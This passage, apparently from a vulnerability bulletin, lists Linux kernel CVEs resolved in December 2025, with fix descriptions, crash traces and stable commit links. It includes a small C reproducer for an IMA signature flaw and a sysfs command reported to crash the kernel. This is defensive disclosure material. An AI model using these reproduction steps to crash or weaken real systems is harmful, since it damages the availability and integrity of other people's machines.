[sd_mod] device_remove+0x87/0xb0 device_release_driver_internal+0x11e/0x230 device_release_driver+0x1a/0x30 bus_remove_device+0x14d/0x220 device_del+0x1e1/0x5a0 __scsi_remove_device+0x1ff/0x2f0 scsi_remove_device+0x37/0x60 sdev_store_delete+0x77/0x100 dev_attr_store+0x1f/0x40 sysfs_kf_write+0x65/0x90 kernfs_fop_write_iter+0x189/0x280 vfs_write+0x256/0x490 ksys_write+0x83/0x190 __x64_sys_write+0x21/0x30 x64_sys_call+0x4608/0x4630 do_syscall_64+0xdb/0x6b0 entry_SYSCALL_64_after_hwframe+0x76/0x7e other info that might help us debug this: Chain exists of: &q->sysfs_lock --> &q->rq_qos_mutex --> &q->q_usage_counter(queue)#3 Possible unsafe locking scenario: CPU0 CPU1 ---- ---- lock(&q->q_usage_counter(queue)#3); lock(&q->rq_qos_mutex); lock(&q->q_usage_counter(queue)#3); lock(&q->sysfs_lock); The root cause is that queue_usage_counter is grabbed with rq_qos_mutex held in blkg_conf_prep(), while the queue should be frozen before rq_qos_mutex from other contexts. The blk_queue_enter() from blkg_conf_prep() is used to protect against policy deactivation, which is already protected with blkcg_mutex, hence convert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile, considering that blkcg_mutex is held after the queue is frozen from policy deactivation, also convert blkg_alloc() to use GFP_NOIO. | 2025-12-16 | not yet calculated | CVE-2025-68178 | https://git.kernel.org/stable/c/e1729523759cda2c0afb76b1c88e0d2f2ef5b7cb https://git.kernel.org/stable/c/56ac639d6fa6fbb99caee74ee1c7276fc9bb47ed https://git.kernel.org/stable/c/0585b24d71197dd9ee8cf79c168a31628c631960 https://git.kernel.org/stable/c/5d726c4dbeeddef612e6bed27edd29733f4d13af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390: Disable ARCH_WANT_OPTIMIZE_HUGETLB_VMEMMAP As reported by Luiz Capitulino enabling HVO on s390 leads to reproducible crashes. The problem is that kernel page tables are modified without flushing corresponding TLB entries. Even if it looks like the empty flush_tlb_all() implementation on s390 is the problem, it is actually a different problem: on s390 it is not allowed to replace an active/valid page table entry with another valid page table entry without the detour over an invalid entry. A direct replacement may lead to random crashes and/or data corruption. In order to invalidate an entry special instructions have to be used (e.g. ipte or idte). Alternatively there are also special instructions available which allow to replace a valid entry with a different valid entry (e.g. crdte or cspg). Given that the HVO code currently does not provide the hooks to allow for an implementation which is compliant with the s390 architecture requirements, disable ARCH_WANT_OPTIMIZE_HUGETLB_VMEMMAP again, which is basically a revert of the original patch which enabled it. | 2025-12-16 | not yet calculated | CVE-2025-68179 | https://git.kernel.org/stable/c/7088465f10816d9425b95740b37c95f082041d76 https://git.kernel.org/stable/c/5e23918e4352288323d13fb511116cdea0234b71 https://git.kernel.org/stable/c/d4a8238e5729505b7394ccb007e5dc3e557aa66b https://git.kernel.org/stable/c/64e2f60f355e556337fcffe80b9bcff1b22c9c42 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix NULL deref in debugfs odm_combine_segments When a connector is connected but inactive (e.g., disabled by desktop environments), pipe_ctx->stream_res.tg will be destroyed. Then, reading odm_combine_segments causes kernel NULL pointer dereference. BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 16 UID: 0 PID: 26474 Comm: cat Not tainted 6.17.0+ #2 PREEMPT(lazy) e6a17af9ee6db7c63e9d90dbe5b28ccab67520c6 Hardware name: LENOVO 21Q4/LNVNB161216, BIOS PXCN25WW 03/27/2025 RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu] Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 <48> 8b 07 48 8b 80 08 02 00> RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286 RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8 RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000 RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0 R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08 R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001 FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0 PKRU: 55555554 Call Trace: <TASK> seq_read_iter+0x125/0x490 ? __alloc_frozen_pages_noprof+0x18f/0x350 seq_read+0x12c/0x170 full_proxy_read+0x51/0x80 vfs_read+0xbc/0x390 ? __handle_mm_fault+0xa46/0xef0 ? do_syscall_64+0x71/0x900 ksys_read+0x73/0xf0 do_syscall_64+0x71/0x900 ? count_memcg_events+0xc2/0x190 ? handle_mm_fault+0x1d7/0x2d0 ? do_user_addr_fault+0x21a/0x690 ? exc_page_fault+0x7e/0x1a0 entry_SYSCALL_64_after_hwframe+0x6c/0x74 RIP: 0033:0x7f44d4031687 Code: 48 89 fa 4c 89 df e8 58 b3 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 <5b> c3 0f 1f 80 00 00 00 00> RSP: 002b:00007ffdb4b5f0b0 EFLAGS: 00000202 ORIG_RAX: 0000000000000000 RAX: ffffffffffffffda RBX: 00007f44d3f9f740 RCX: 00007f44d4031687 RDX: 0000000000040000 RSI: 00007f44d3f5e000 RDI: 0000000000000003 RBP: 0000000000040000 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000202 R12: 00007f44d3f5e000 R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000040000 </TASK> Modules linked in: tls tcp_diag inet_diag xt_mark ccm snd_hrtimer snd_seq_dummy snd_seq_midi snd_seq_oss snd_seq_midi_event snd_rawmidi snd_seq snd_seq_device x> snd_hda_codec_atihdmi snd_hda_codec_realtek_lib lenovo_wmi_helpers think_lmi snd_hda_codec_generic snd_hda_codec_hdmi snd_soc_core kvm snd_compress uvcvideo sn> platform_profile joydev amd_pmc mousedev mac_hid sch_fq_codel uinput i2c_dev parport_pc ppdev lp parport nvme_fabrics loop nfnetlink ip_tables x_tables dm_cryp> CR2: 0000000000000000 ---[ end trace 0000000000000000 ]--- RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu] Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 <48> 8b 07 48 8b 80 08 02 00> RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286 RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8 RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000 RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0 R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08 R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001 FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0 PKRU: 55555554 Fix this by checking pipe_ctx-> ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68180 | https://git.kernel.org/stable/c/d990c7f180aa7c6ffd2c1b3c77160e50672039ce https://git.kernel.org/stable/c/c05fe5d47baac212a3a74b279239f495be101629 https://git.kernel.org/stable/c/6dd97ceb645c08aca9fc871a3006e47fe699f0ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/radeon: Remove calls to drm_put_dev() Since the allocation of the drivers main structure was changed to devm_drm_dev_alloc() drm_put_dev()'ing to trigger it to be free'd should be done by devres. However, drm_put_dev() is still in the probe error and device remove paths. When the driver fails to probe warnings like the following are shown because devres is trying to drm_put_dev() after the driver already did it. [ 5.642230] radeon 0000:01:05.0: probe with driver radeon failed with error -22 [ 5.649605] ------------[ cut here ]------------ [ 5.649607] refcount_t: underflow; use-after-free. [ 5.649620] WARNING: CPU: 0 PID: 357 at lib/refcount.c:28 refcount_warn_saturate+0xbe/0x110 (cherry picked from commit 3eb8c0b4c091da0a623ade0d3ee7aa4a93df1ea4) | 2025-12-16 | not yet calculated | CVE-2025-68181 | https://git.kernel.org/stable/c/2fa41445d8c98f2a65503c373796466496edc0e7 https://git.kernel.org/stable/c/ec18f6b2c743cc471b2539ddb5caed20a012e640 https://git.kernel.org/stable/c/745bae76acdd71709773c129a69deca01036250b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix potential use after free in iwl_mld_remove_link() This code frees "link" by calling kfree_rcu(link, rcu_head) and then it dereferences "link" to get the "link->fw_id". Save the "link->fw_id" first to avoid a potential use after free. | 2025-12-16 | not yet calculated | CVE-2025-68182 | https://git.kernel.org/stable/c/5b4a239c9f94e1606435f1842fc6fd426d607dbb https://git.kernel.org/stable/c/77e67d5daaf155f7d0f99f4e797c4842169ec19e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ima: don't clear IMA_DIGSIG flag when setting or removing non-IMA xattr Currently when both IMA and EVM are in fix mode, the IMA signature will be reset to IMA hash if a program first stores IMA signature in security.ima and then writes/removes some other security xattr for the file. For example, on Fedora, after booting the kernel with "ima_appraise=fix evm=fix ima_policy=appraise_tcb" and installing rpm-plugin-ima, installing/reinstalling a package will not make good reference IMA signature generated. Instead IMA hash is generated, # getfattr -m - -d -e hex /usr/bin/bash # file: usr/bin/bash security.ima=0x0404... This happens because when setting security.selinux, the IMA_DIGSIG flag that had been set early was cleared. As a result, IMA hash is generated when the file is closed. Similarly, IMA signature can be cleared on file close after removing security xattr like security.evm or setting/removing ACL. Prevent replacing the IMA file signature with a file hash, by preventing the IMA_DIGSIG flag from being reset. Here's a minimal C reproducer which sets security.selinux as the last step which can also replaced by removing security.evm or setting ACL, #include <stdio.h> #include <sys/xattr.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdlib.h> int main() { const char* file_path = "/usr/sbin/test_binary"; const char* hex_string = "030204d33204490066306402304"; int length = strlen(hex_string); char* ima_attr_value; int fd; fd = open(file_path, O_WRONLY|O_CREAT|O_EXCL, 0644); if (fd == -1) { perror("Error opening file"); return 1; } ima_attr_value = (char*)malloc(length / 2 ); for (int i = 0, j = 0; i < length; i += 2, j++) { sscanf(hex_string + i, "%2hhx", &ima_attr_value[j]); } if (fsetxattr(fd, "security.ima", ima_attr_value, length/2, 0) == -1) { perror("Error setting extended attribute"); close(fd); return 1; } const char* selinux_value= "system_u:object_r:bin_t:s0"; if (fsetxattr(fd, "security.selinux", selinux_value, strlen(selinux_value), 0) == -1) { perror("Error setting extended attribute"); close(fd); return 1; } close(fd); return 0; } | 2025-12-16 | not yet calculated | CVE-2025-68183 | https://git.kernel.org/stable/c/d2993a7e98eb70c737c6f5365a190e79c72b8407 https://git.kernel.org/stable/c/edd824eb45e4f7e05ad3ab090dab6dbdb79cd292 https://git.kernel.org/stable/c/02aa671c08a4834bef5166743a7b88686fbfa023 https://git.kernel.org/stable/c/88b4cbcf6b041ae0f2fc8a34554a5b6a83a2b7cd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: Disable AFBC support on Mediatek DRM driver Commit c410fa9b07c3 ("drm/mediatek: Add AFBC support to Mediatek DRM driver") added AFBC support to Mediatek DRM and enabled the 32x8/split/sparse modifier. However, this is currently broken on Mediatek MT8188 (Genio 700 EVK platform); tested using upstream Kernel and Mesa (v25.2.1), AFBC is used by default since Mesa v25.0. Kernel trace reports vblank timeouts constantly, and the render is garbled: ``` [CRTC:62:crtc-0] vblank wait timed out WARNING: CPU: 7 PID: 70 at drivers/gpu/drm/drm_atomic_helper.c:1835 drm_atomic_helper_wait_for_vblanks.part.0+0x24c/0x27c [...] Hardware name: MediaTek Genio-700 EVK (DT) Workqueue: events_unbound commit_work pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : drm_atomic_helper_wait_for_vblanks.part.0+0x24c/0x27c lr : drm_atomic_helper_wait_for_vblanks.part.0+0x24c/0x27c sp : ffff80008337bca0 x29: ffff80008337bcd0 x28: 0000000000000061 x27: 0000000000000000 x26: 0000000000000001 x25: 0000000000000000 x24: ffff0000c9dcc000 x23: 0000000000000001 x22: 0000000000000000 x21: ffff0000c66f2f80 x20: ffff0000c0d7d880 x19: 0000000000000000 x18: 000000000000000a x17: 000000040044ffff x16: 005000f2b5503510 x15: 0000000000000000 x14: 0000000000000000 x13: 74756f2064656d69 x12: 742074696177206b x11: 0000000000000058 x10: 0000000000000018 x9 : ffff800082396a70 x8 : 0000000000057fa8 x7 : 0000000000000cce x6 : ffff8000823eea70 x5 : ffff0001fef5f408 x4 : ffff80017ccee000 x3 : ffff0000c12cb480 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0000c12cb480 Call trace: drm_atomic_helper_wait_for_vblanks.part.0+0x24c/0x27c (P) drm_atomic_helper_commit_tail_rpm+0x64/0x80 commit_tail+0xa4/0x1a4 commit_work+0x14/0x20 process_one_work+0x150/0x290 worker_thread+0x2d0/0x3ec kthread+0x12c/0x210 ret_from_fork+0x10/0x20 ---[ end trace 0000000000000000 ]--- ``` Until this gets fixed upstream, disable AFBC support on this platform, as it's currently broken with upstream Mesa. | 2025-12-16 | not yet calculated | CVE-2025-68184 | https://git.kernel.org/stable/c/df1ad5de2197ea1b527d13ae7b699e9ee7d724d4 https://git.kernel.org/stable/c/0eaa0a3dfe218c4cf1a0782ccbbc9e3931718f17 https://git.kernel.org/stable/c/72223700b620885d556a4c52a63f5294316176c6 https://git.kernel.org/stable/c/9882a40640036d5bbc590426a78981526d4f2345 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfs4_setup_readdir(): insufficient locking for ->d_parent->d_inode dereferencing Theoretically it's an oopsable race, but I don't believe one can manage to hit it on real hardware; might become doable on a KVM, but it still won't be easy to attack. Anyway, it's easy to deal with - since xdr_encode_hyper() is just a call of put_unaligned_be64(), we can put that under ->d_lock and be done with that. | 2025-12-16 | not yet calculated | CVE-2025-68185 | https://git.kernel.org/stable/c/6025f641a0e30afdc5aa62017397b1860ad9f677 https://git.kernel.org/stable/c/e6cafe71eb3b5579b245ba1bd528a181e77f3df1 https://git.kernel.org/stable/c/fa4daf7d11e45b72aad5d943a7ab991f869fff79 https://git.kernel.org/stable/c/504b3fb9948a9e96ebbabdee0d33966a8bab15cb https://git.kernel.org/stable/c/eacfd08b26a062f1095b18719715bc82ad35312e https://git.kernel.org/stable/c/40be5b9080114f18b0cea386db415b68a7273c1a https://git.kernel.org/stable/c/f5e570eaab36a110c6ffda32b87c51170990c2d1 https://git.kernel.org/stable/c/a890a2e339b929dbd843328f9a92a1625404fe63 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ring-buffer: Do not warn in ring_buffer_map_get_reader() when reader catches up The function ring_buffer_map_get_reader() is a bit more strict than the other get reader functions, and except for certain situations the rb_get_reader_page() should not return NULL. If it does, it triggers a warning. This warning was triggering but after looking at why, it was because another acceptable situation was happening and it wasn't checked for. If the reader catches up to the writer and there's still data to be read on the reader page, then the rb_get_reader_page() will return NULL as there's no new page to get. In this situation, the reader page should not be updated and no warning should trigger. | 2025-12-16 | not yet calculated | CVE-2025-68186 | https://git.kernel.org/stable/c/b42dbef4f208326271434d5ab71c4129a3ddd1a9 https://git.kernel.org/stable/c/6f5c4f8109fa4d0955b3712597a26b310bdc736f https://git.kernel.org/stable/c/aa997d2d2a0b2e76f4df0f1f12829f02acb4fb6b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mdio: Check regmap pointer returned by device_node_to_regmap() The call to device_node_to_regmap() in airoha_mdio_probe() can return an ERR_PTR() if regmap initialization fails. Currently, the driver stores the pointer without validation, which could lead to a crash if it is later dereferenced. Add an IS_ERR() check and return the corresponding error code to make the probe path more robust. | 2025-12-16 | not yet calculated | CVE-2025-68187 | https://git.kernel.org/stable/c/dc8ed3823473bb38ba43cfb34f1e1c1baa22f975 https://git.kernel.org/stable/c/b2b526c2cf57d14ee269e012ed179081871f45a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() Use RCU to avoid a pair of atomic operations and a potential UAF on dst_dev()->flags. | 2025-12-16 | not yet calculated | CVE-2025-68188 | https://git.kernel.org/stable/c/bc2b881a0896c111c1041d8bb1f92a3b3873ace5 https://git.kernel.org/stable/c/06da08d9355bf8e2070459bbedbe372ccc02cc0e https://git.kernel.org/stable/c/b62a59c18b692f892dcb8109c1c2e653b2abc95c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: Fix GEM free for imported dma-bufs Imported dma-bufs also have obj->resv != &obj->_resv. So we should check both this condition in addition to flags for handling the _NO_SHARE case. Fixes this splat that was reported with IRIS video playback: ------------[ cut here ]------------ WARNING: CPU: 3 PID: 2040 at drivers/gpu/drm/msm/msm_gem.c:1127 msm_gem_free_object+0x1f8/0x264 [msm] CPU: 3 UID: 1000 PID: 2040 Comm: .gnome-shell-wr Not tainted 6.17.0-rc7 #1 PREEMPT pstate: 81400005 (Nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) pc : msm_gem_free_object+0x1f8/0x264 [msm] lr : msm_gem_free_object+0x138/0x264 [msm] sp : ffff800092a1bb30 x29: ffff800092a1bb80 x28: ffff800092a1bce8 x27: ffffbc702dbdbe08 x26: 0000000000000008 x25: 0000000000000009 x24: 00000000000000a6 x23: ffff00083c72f850 x22: ffff00083c72f868 x21: ffff00087e69f200 x20: ffff00087e69f330 x19: ffff00084d157ae0 x18: 0000000000000000 x17: 0000000000000000 x16: ffffbc704bd46b80 x15: 0000ffffd0959540 x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000 x11: ffffbc702e6cdb48 x10: 0000000000000000 x9 : 000000000000003f x8 : ffff800092a1ba90 x7 : 0000000000000000 x6 : 0000000000000020 x5 : ffffbc704bd46c40 x4 : fffffdffe102cf60 x3 : 0000000000400032 x2 : 0000000000020000 x1 : ffff00087e6978e8 x0 : ffff00087e6977e8 Call trace: msm_gem_free_object+0x1f8/0x264 [msm] (P) drm_gem_object_free+0x1c/0x30 [drm] drm_gem_object_handle_put_unlocked+0x138/0x150 [drm] drm_gem_object_release_handle+0x5c/0xcc [drm] drm_gem_handle_delete+0x68/0xbc [drm] drm_gem_close_ioctl+0x34/0x40 [drm] drm_ioctl_kernel+0xc0/0x130 [drm] drm_ioctl+0x360/0x4e0 [drm] __arm64_sys_ioctl+0xac/0x104 invoke_syscall+0x48/0x104 el0_svc_common.constprop.0+0x40/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0xec el0t_64_sync_handler+0xa0/0xe4 el0t_64_sync+0x198/0x19c ---[ end trace 0000000000000000 ]--- ------------[ cut here ]------------ Patchwork: https://patchwork.freedesktop.org/patch/676273/ | 2025-12-16 | not yet calculated | CVE-2025-68189 | https://git.kernel.org/stable/c/9674c4cb2fe62727a2e4d3f66065ab949dfa61be https://git.kernel.org/stable/c/c34e08ba6c0037a72a7433741225b020c989e4ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked() kcalloc() may fail. When WS is non-zero and allocation fails, ectx.ws remains NULL while ectx.ws_size is set, leading to a potential NULL pointer dereference in atom_get_src_int() when accessing WS entries. Return -ENOMEM on allocation failure to avoid the NULL dereference. | 2025-12-16 | not yet calculated | CVE-2025-68190 | https://git.kernel.org/stable/c/35f3fb86bb0158a298d6834e7e110dcaf07f490c https://git.kernel.org/stable/c/997e28d3d00a1d30649629515e4402612921205b https://git.kernel.org/stable/c/cc9a8e238e42c1f43b98c097995137d644b69245 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udp_tunnel: use netdev_warn() instead of netdev_WARN() netdev_WARN() uses WARN/WARN_ON to print a backtrace along with file and line information. In this case, udp_tunnel_nic_register() returning an error is just a failed operation, not a kernel bug. udp_tunnel_nic_register() can fail due to a memory allocation failure (kzalloc() or udp_tunnel_nic_alloc()). This is a normal runtime error and not a kernel bug. Replace netdev_WARN() with netdev_warn() accordingly. | 2025-12-16 | not yet calculated | CVE-2025-68191 | https://git.kernel.org/stable/c/087f1ed450dc6e7e49ffbbbe5b78be1218c6d5e0 https://git.kernel.org/stable/c/45e4e4a8772fa1c5f6f38e82b732b3a9d8137af4 https://git.kernel.org/stable/c/7758ec35ff3e9a31558eda4f0f9eb0ddfa78a8ba https://git.kernel.org/stable/c/c018a87942bf1607aeebf8dba5a210ca9a09a0fd https://git.kernel.org/stable/c/51b3033088f0420b19027e3d54cd989b6ebd987e https://git.kernel.org/stable/c/3c3b148bf8384c8a787753cf20abde1c5731f97f https://git.kernel.org/stable/c/dc2f650f7e6857bf384069c1a56b2937a1ee370d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: qmi_wwan: initialize MAC header offset in qmimux_rx_fixup Raw IP packets have no MAC header, leaving skb->mac_header uninitialized. This can trigger kernel panics on ARM64 when xfrm or other subsystems access the offset due to strict alignment checks. Initialize the MAC header to prevent such crashes. This can trigger kernel panics on ARM when running IPsec over the qmimux0 interface. Example trace: Internal error: Oops: 000000009600004f [#1] SMP CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.34-gbe78e49cb433 #1 Hardware name: LS1028A RDB Board (DT) pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : xfrm_input+0xde8/0x1318 lr : xfrm_input+0x61c/0x1318 sp : ffff800080003b20 Call trace: xfrm_input+0xde8/0x1318 xfrm6_rcv+0x38/0x44 xfrm6_esp_rcv+0x48/0xa8 ip6_protocol_deliver_rcu+0x94/0x4b0 ip6_input_finish+0x44/0x70 ip6_input+0x44/0xc0 ipv6_rcv+0x6c/0x114 __netif_receive_skb_one_core+0x5c/0x8c __netif_receive_skb+0x18/0x60 process_backlog+0x78/0x17c __napi_poll+0x38/0x180 net_rx_action+0x168/0x2f0 | 2025-12-16 | not yet calculated | CVE-2025-68192 | https://git.kernel.org/stable/c/d693c47fb902b988f5752182e4f7fbde5e6dcaf9 https://git.kernel.org/stable/c/0aabccdcec1f4a36f95829ea2263f845bbc77223 https://git.kernel.org/stable/c/4e6b9004f01d0fef5b19778399bc5bf55f8c2d71 https://git.kernel.org/stable/c/bf527b80b80a282ab5bf1540546211fc35e5cd42 https://git.kernel.org/stable/c/dd03780c29f87c26c0e0bb7e0db528c8109461fb https://git.kernel.org/stable/c/ae811175cea35b03ac6d7c910f43a82a43b9c3b3 https://git.kernel.org/stable/c/8ab3b8f958d861a7f725a5be60769106509fbd69 https://git.kernel.org/stable/c/e120f46768d98151ece8756ebd688b0e43dc8b29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/guc: Add devm release action to safely tear down CT When a buffer object (BO) is allocated with the XE_BO_FLAG_GGTT_INVALIDATE flag, the driver initiates TLB invalidation requests via the CTB mechanism while releasing the BO. However a premature release of the CTB BO can lead to system crashes, as observed in: Oops: Oops: 0000 [#1] SMP NOPTI RIP: 0010:h2g_write+0x2f3/0x7c0 [xe] Call Trace: guc_ct_send_locked+0x8b/0x670 [xe] xe_guc_ct_send_locked+0x19/0x60 [xe] send_tlb_invalidation+0xb4/0x460 [xe] xe_gt_tlb_invalidation_ggtt+0x15e/0x2e0 [xe] ggtt_invalidate_gt_tlb.part.0+0x16/0x90 [xe] ggtt_node_remove+0x110/0x140 [xe] xe_ggtt_node_remove+0x40/0xa0 [xe] xe_ggtt_remove_bo+0x87/0x250 [xe] Introduce a devm-managed release action during xe_guc_ct_init() and xe_guc_ct_init_post_hwconfig() to ensure proper CTB disablement before resource deallocation, preventing the use-after-free scenario. | 2025-12-16 | not yet calculated | CVE-2025-68193 | https://git.kernel.org/stable/c/52faa05fcd9f78af99abebe30a4b7b444744c991 https://git.kernel.org/stable/c/ee4b32220a6b41e71512e8804585325e685456ba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: imon: make send_packet() more robust syzbot is reporting that imon has three problems which result in hung tasks due to forever holding device lock [1]. First problem is that when usb_rx_callback_intf0() once got -EPROTO error after ictx->dev_present_intf0 became true, usb_rx_callback_intf0() resubmits urb after printk(), and resubmitted urb causes usb_rx_callback_intf0() to again get -EPROTO error. This results in printk() flooding (RCU stalls). Alan Stern commented [2] that In theory it's okay to resubmit _if_ the driver has a robust error-recovery scheme (such as giving up after some fixed limit on the number of errors or after some fixed time has elapsed, perhaps with a time delay to prevent a flood of errors). Most drivers don't bother to do this; they simply give up right away. This makes them more vulnerable to short-term noise interference during USB transfers, but in reality such interference is quite rare. There's nothing really wrong with giving up right away. but imon has a poor error-recovery scheme which just retries forever; this behavior should be fixed. Since I'm not sure whether it is safe for imon users to give up upon any error code, this patch takes care of only union of error codes chosen from modules in drivers/media/rc/ directory which handle -EPROTO error (i.e. ir_toy, mceusb and igorplugusb). Second problem is that when usb_rx_callback_intf0() once got -EPROTO error before ictx->dev_present_intf0 becomes true, usb_rx_callback_intf0() always resubmits urb due to commit 8791d63af0cf ("[media] imon: don't wedge hardware after early callbacks"). Move the ictx->dev_present_intf0 test introduced by commit 6f6b90c9231a ("[media] imon: don't parse scancodes until intf configured") to immediately before imon_incoming_packet(), or the first problem explained above happens without printk() flooding (i.e. hung task). 
Third problem is that when usb_rx_callback_intf0() is not called for some reason (e.g. flaky hardware; the reproducer for this problem sometimes prevents usb_rx_callback_intf0() from being called), wait_for_completion_interruptible() in send_packet() never returns (i.e. hung task). As a workaround for such situation, change send_packet() to wait for completion with timeout of 10 seconds. | 2025-12-16 | not yet calculated | CVE-2025-68194 | https://git.kernel.org/stable/c/519737af11c03590819a6eec2ad532cfdb87ea63 https://git.kernel.org/stable/c/f58ab83b7b7133e6baefe03a46846c4f6ce45e2f https://git.kernel.org/stable/c/26f6a1dd5d81ad61a875a747698da6f27abf389b https://git.kernel.org/stable/c/667afd4681781f60a644cd0d2ee6c59cb1c36208 https://git.kernel.org/stable/c/8231e80118463be5598daaf266c1c83650f1948b https://git.kernel.org/stable/c/0213e4175abbb9dfcbf7c197e3817d527f459ad5 https://git.kernel.org/stable/c/f7f3ecb4934fff782fa9bb1cd16e2290c041b22d https://git.kernel.org/stable/c/eecd203ada43a4693ce6fdd3a58ae10c7819252c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Add missing terminator for zen5_rdseed_microcode Running x86_match_min_microcode_rev() on a Zen5 CPU trips up KASAN for an out of bounds access. | 2025-12-16 | not yet calculated | CVE-2025-68195 | https://git.kernel.org/stable/c/4c6b56a76478bd1ab609827c571905386c11d308 https://git.kernel.org/stable/c/f1fdffe0afea02ba783acfe815b6a60e7180df40 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Cache streams targeting link when performing LT automation [WHY] Last LT automation update can cause crash by referencing current_state and calling into dc_update_planes_and_stream which may clobber current_state. [HOW] Cache relevant stream pointers and iterate through them instead of relying on the current_state. | 2025-12-16 | not yet calculated | CVE-2025-68196 | https://git.kernel.org/stable/c/9ecd238e8230e83a5c5436fd2261da4518f5c979 https://git.kernel.org/stable/c/f5b69101f956f5b89605a13cb15f093a7906f2a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix null pointer dereference in bnxt_bs_trace_check_wrap() With older FW, we may get the ASYNC_EVENT_CMPL_EVENT_ID_DBG_BUF_PRODUCER for FW trace data type that has not been initialized. This will result in a crash in bnxt_bs_trace_type_wrap(). Add a guard to check for a valid magic_byte pointer before proceeding. | 2025-12-16 | not yet calculated | CVE-2025-68197 | https://git.kernel.org/stable/c/689ae5ba31293eebb7f21c0ef8939468ac72b5ce https://git.kernel.org/stable/c/ff02be05f78399c766be68ab0b2285ff90b2aaa8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crash: fix crashkernel resource shrink When crashkernel is configured with a high reservation, shrinking its value below the low crashkernel reservation causes two issues: 1. Invalid crashkernel resource objects 2. Kernel crash if crashkernel shrinking is done twice For example, with crashkernel=200M,high, the kernel reserves 200MB of high memory and some default low memory (say 256MB). The reservation appears as: cat /proc/iomem | grep -i crash af000000-beffffff : Crash kernel 433000000-43f7fffff : Crash kernel If crashkernel is then shrunk to 50MB (echo 52428800 > /sys/kernel/kexec_crash_size), /proc/iomem still shows 256MB reserved: af000000-beffffff : Crash kernel Instead, it should show 50MB: af000000-b21fffff : Crash kernel Further shrinking crashkernel to 40MB causes a kernel crash with the following trace (x86): BUG: kernel NULL pointer dereference, address: 0000000000000038 PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI <snip...> Call Trace: <TASK> ? __die_body.cold+0x19/0x27 ? page_fault_oops+0x15a/0x2f0 ? search_module_extables+0x19/0x60 ? search_bpf_extables+0x5f/0x80 ? exc_page_fault+0x7e/0x180 ? asm_exc_page_fault+0x26/0x30 ? __release_resource+0xd/0xb0 release_resource+0x26/0x40 